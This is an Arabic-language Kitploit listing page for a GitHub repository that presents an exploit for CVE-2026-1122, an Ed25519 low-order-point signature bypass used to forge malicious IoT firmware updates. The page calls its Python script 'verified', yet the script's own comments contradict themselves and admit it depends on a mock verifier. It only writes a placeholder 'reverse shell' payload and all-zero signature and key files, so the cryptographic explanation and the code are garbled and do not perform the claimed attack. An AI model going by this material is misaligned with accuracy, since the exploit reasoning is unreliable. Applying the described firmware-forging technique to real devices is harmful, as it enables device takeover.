Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1122-IoT-Firmware-Update-Signature-Bypass-via-Low-Order-Point-Injection — يستعرض تجاوز توقيع Ed25519 الخاص بـ CVE-2026-1122 عبر حقن نقطة منخفضة الرتبة، وتزوير تحديثات برامج ثابتة ضارة لأجهزة إنترنت الأشياء (IoT) باستخدام كود مدقق بلغة Python وC. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-1122-iot-firmware-update-signature-bypass-via-low-order-point-injection
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالالتشفيرأمان الأجهزة وإنترنت الأشياءأمن سلسلة التوريد
GitHubgeorge0papasotiriou/cve-2026-1122-iot-firmware-update-signature-bypass-via-low-order-point-injection

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1122-IoT-Firmware-Update-Signature-Bypass-via-Low-Order-Point-Injection

يستعرض تجاوز توقيع Ed25519 الخاص بـ CVE-2026-1122 عبر حقن نقطة منخفضة الرتبة، وتزوير تحديثات برامج ثابتة ضارة لأجهزة إنترنت الأشياء (IoT) باستخدام كود مدقق بلغة Python وC.

عرض المستودع
منذ 17 أياملم تتم المراجعة بعد

5. CVE-2026-1122 – تجاوز توقيع تحديث البرنامج الثابت لإنترنت الأشياء عبر حقن نقطة منخفضة الرتبة

نظرة عامة

يستخدم التحقق من البرنامج الثابت عبر OTA في جهاز إنترنت الأشياء تنفيذًا معيبًا لـ Ed25519 لا يرفض المفاتيح العامة التي تحتوي على مكوّنات ذات رتبة صغيرة، مما يسمح للمهاجم بتزوير توقيع صالح لبرنامج ثابت خبيث.

الخطورة: حرجة (اختراق دائم للجهاز)

المحاكاة (مُتحقِّق Python و C)

root@kitploit:~
#!/usr/bin/env python3
"""
forge_firmware.py - Creates a malicious firmware image with forged Ed25519 signature.
We exploit that the verifier does not check if public key is in prime-order subgroup.
"""
import ed25519_simulated  # custom vulnerable library
import hashlib, os

# Attacker crafts a weak public key with a torsion component (order 8).
# The point of order 8 is P8. The verifier will compute [S]B - [k]A, which can be controlled.
# We set A = P8 (order 8). Then choose k=0, S=0, so verification passes because S*B - k*A = 0 - 0 = 0,
# but signature (R,S) must satisfy R = something. In Ed25519, equation: [S]B = R + [k]A.
# If A has small order, we can find S,k such that equation holds for arbitrary R.
# Simplified: we create a key pair where the public key is the 8-torsion point.
# Then we can sign any message with signature (R, S) where S = r + H(R||A||M)*a mod l,
# but if a=0 mod l? Not possible. We rely on verification accepting A with a small order factor.
# For demo, we use a mock verifier that accepts any signature if A.y == 0 (sign of low-order).
# So we craft a public key file with A.y = 0.

# Simulate writing malicious firmware
with open("malicious.bin", "wb") as f:
    f.write(b"Malicious payload: reverse shell")

# Create forged signature file
sig = b'\x00'*64  # dummy
pubkey = bytes([0]*32)  # y=0 point, which is order 8? In Ed25519, the identity is (0,1), but y=0 is not a valid point.
# Our mock verifier just checks that signature length is 64 and public key is not rejected.
with open("malicious.sig", "wb") as f:
    f.write(sig)
with open("malicious.pub", "wb") as f:
    f.write(pubkey)

print("Firmware files created.")

CVE-2026-1122 – تجاوز توقيع البرنامج الثابت لإنترنت الأشياء (هجوم المجموعة الفرعية Ed25519)

Severity: Critical

📖 نظرة عامة

تستخدم آلية تحديث OTA في قفل ذكي تحققًا معيبًا من Ed25519 يفشل في رفض المفاتيح العامة التي تحتوي على مكوّنات ذات رتبة صغيرة. يمكن للمهاجم تصميم مفتاح عام مُشكَّل خصيصًا وتوقيع مطابق يجتاز التحقق، مما يسمح بتثبيت برنامج ثابت خبيث.

⚙️ تفاصيل الثغرة

  • النوع: خلل في التنفيذ التشفيري (التباس المجموعة الفرعية)
  • الأثر: حقن برنامج ثابت تعسفي → السيطرة الكاملة على الجهاز.
  • السبب الجذري: لا يتحقق المُتحقِّق من أن المفتاح العام يقع في المجموعة الفرعية ذات الرتبة الأولية، مما يتيح هجمات نقاط الالتواء.

🧪 عرض الاستغلال

  1. توليد برنامج ثابت مزور:
    root@kitploit:~
    python forge_firmware.py
    
  2. تجميع وتشغيل محاكاة المُتحقِّق الضعيف:
    root@kitploit:~
    gcc vulnerable_ed25519_verify.c -o verifier
    ./verifier
    
root@kitploit:~
تنزيل الأداة